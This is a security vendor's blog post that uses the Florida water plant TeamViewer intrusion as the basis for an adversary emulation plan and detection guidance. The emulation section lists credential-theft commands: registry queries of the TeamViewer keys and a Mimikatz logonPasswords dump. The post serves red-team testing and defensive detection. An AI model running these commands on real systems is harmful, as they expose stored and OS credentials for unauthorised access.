Florida Water Plant Breach
TeamViewer was at the forefront of an attack on a Florida water facility in February 2021. A malicious actor logged into the water treatment facility’s computer system through the remote desktop software and tried to increase the amount of sodium hydroxide to a dangerous level. As SCYTHE CEO and co-founder of ICS Village at DefCon, Bryson Bort, said in this Inside CyberSecurity news article, “TeamViewer is a common remote desktop protocol (RDP) solution in ICS and the water attack was most likely simple access with stolen credentials. Using the software means everything is visible to the user (hence, the operator saw the mouse move and settings changed). Who and why is still the question.”
While using shared credentials (or Valid Accounts in ATT&CK) feels low sophistication, we thought it would be worthwhile to show how we can steal TeamViewer credentials in this edition of #ThreatThursday. We are also collaborating with the ICS Village to demo this and other TTPs at Hack the Capitol and RSA Conference so this post will expand with videos after the conference embargo.
Cyber Threat Intelligence
Many organizations (believe it or not) still use TeamViewer to allow support teams interactive access to their computers for troubleshooting. In the example of the Florida water facility attack, TeamViewer was supposed to have been removed six months prior to the attack. This is a clear indication you may find various, outdated versions of TeamViewer in an environment.
For more on the Florida water plant breach, watch this video with Bryson Bort for RSAC:
As we performed our research on TeamViewer, we learned that previous versions of TeamViewer exposed credentials in the registry. While the credentials are encrypted, there is a known decryption key. We also found other, since-patched vulnerabilities related to credential exposure, such as CVE-2020-13699. In the latest version of TeamViewer (as of April 28, 2021), there are no known methods to steal the clear text credentials used to log in to a remote machine, short of taking a screenshot of the splash screen. Since we do not know what version of TeamViewer is running on the target systems, we have created a threat that uses all known methods.
Adversary Emulation Plan
TeamViewer can be installed as a local, non-administrative user or as a service with local administrator privileges. For this reason, we have designed a SCYTHE threat that leverages the automation language to determine the permission level of the SCYTHE payload and steal the credentials from the respective locations. At a high level, the threat does the following:
1. Print Screen: printscr --window Desktop
2. System Information: sysinfo
3. Check controller integrity: controller --integrity
4. If high integrity:
- Unmanaged PowerShell to pull the registry information about TeamViewer: upsh --cmd Get-ItemProperty -Path HKLM:\SOFTWARE\WOW6432Node\TeamViewer
- Mimikatz to dump OS credentials: mimikatz --arglist sekurlsa::logonPasswords
5. If non-admin, check these registry keys:
- reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer
- reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer\MachineFallback
If you do not have SCYTHE, you can use the reg query command to pull TeamViewer information using the below commands:
- reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer
- reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer\MachineFallback
- reg query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer
If you do use SCYTHE, then you get a nice splash screen with credentials:
Here is an ATT&CK heatmap of all the TTPs we have just emulated:
Detection and Response
Do you have TeamViewer in your environment? If you’re not sure, there are multiple ways to check:
- Scan all hosts for TeamViewer.exe process
- Check for the TeamViewer service
- Look for the registry keys mentioned in this post
- Observe network traffic to confirm no TeamViewer connections are leaving your network
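As an added example (not SCYTHE's code or the threat itself), the PowerShell below runs the four checks above on a single Windows host: it uses the registry keys listed in this post and assumes TeamViewer's process and service names start with "TeamViewer". It reports only registry value names, not values, since the values may contain stored credentials.

```powershell
# Added example, not part of the original post. Run from an elevated PowerShell
# so that HKLM and every user's processes are readable.
$findings = [ordered]@{}

# 1. Running processes (assumed to be named TeamViewer*, e.g. TeamViewer.exe)
$procs = Get-Process -Name 'TeamViewer*' -ErrorAction SilentlyContinue
$findings['Processes'] = $procs | Select-Object Id, ProcessName, Path

# 2. Installed service (assumed to be named TeamViewer*)
$svc = Get-Service -Name 'TeamViewer*' -ErrorAction SilentlyContinue
$findings['Services'] = $svc | Select-Object Name, Status, StartType

# 3. Registry keys from the post: report existence and value names only
$keys = @(
    'HKCU:\SOFTWARE\TeamViewer',
    'HKCU:\SOFTWARE\TeamViewer\MachineFallback',
    'HKLM:\SOFTWARE\WOW6432Node\TeamViewer'
)
$findings['Registry'] = foreach ($k in $keys) {
    if (Test-Path $k) {
        $item = Get-Item $k
        [pscustomobject]@{
            Key        = $k
            ValueNames = ($item.Property -join ', ')
            Version    = $item.GetValue('Version')   # null if the value is absent
        }
    }
}

# 4. Established TCP connections owned by TeamViewer processes
if ($procs) {
    $tvPids = @($procs.Id)
    $findings['Connections'] = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $tvPids -contains $_.OwningProcess } |
        Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess
}

# Print each section; an empty section means that check found nothing
foreach ($section in $findings.Keys) {
    Write-Host "== $section =="
    if ($findings[$section]) {
        $findings[$section] | Format-Table -AutoSize | Out-String | Write-Host
    } else {
        Write-Host 'none found'
    }
}
```

Any hit under Registry on a host where TeamViewer was supposedly removed is the stale-install condition this post describes; a hit under Connections with no approved support session is worth an immediate look.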
TeamViewer continues to be used by a number of organizations. As a red teamer, when you land on a system, you should check if TeamViewer is installed and running. We leverage a number of methods to obtain TeamViewer credentials with this threat, which you can test immediately by importing it into SCYTHE. At Hack the Capitol and RSAC, we will be revealing some other TTPs related to TeamViewer and attacks against ICS systems, such as how to bring the splash screen to the foreground, as well as the entire attack chain. We hope to see you there!
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.